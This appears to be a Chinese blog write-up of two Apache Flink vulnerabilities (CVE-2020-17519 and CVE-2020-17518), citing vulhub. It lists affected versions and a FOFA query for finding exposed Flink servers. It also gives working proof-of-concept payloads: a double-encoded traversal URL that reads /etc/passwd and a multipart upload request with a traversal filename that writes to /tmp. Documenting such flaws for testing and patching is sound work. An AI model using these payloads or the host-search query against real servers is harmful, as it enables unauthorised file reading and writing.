Apache Flink CVE-2020-17518 & CVE-2020-17519

CVE-2020-17519 jobmanager/logs路径遍历

介绍

Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

影响版本

1.11.0
1.11.1
1.11.2

FOFA

app=”APACHE-Flink”

漏洞验证

POC:

http://example/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
1

Apache Flink CVE-2020-17518 & CVE-2020-17519


CVE-2020-17518 上传路径遍历

介绍

Apache Flink 1.5.1引入了REST处理程序,该处理程序允许您通过经过恶意修改的HTTP HEADER将上传的文件写入本地文件系统上的任意位置。

影响版本

1.5.1-1.11.2

FOFA

app=”APACHE-Flink”

漏洞验证

POC:

POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

Apache Flink CVE-2020-17518 & CVE-2020-17519


通过上面的路径遍历可知文件写入成功:
Apache Flink CVE-2020-17518 & CVE-2020-17519

Apache Flink CVE-2020-17518 & CVE-2020-17519

 

参考链接

https://github.com/vulhub/vulhub

Apache Flink CVE-2020-17518 & CVE-2020-17519

上一篇:jQuery中的Ajax以及接口介绍


下一篇:在文件上传对于拼接时,加入了+File.separator+的作用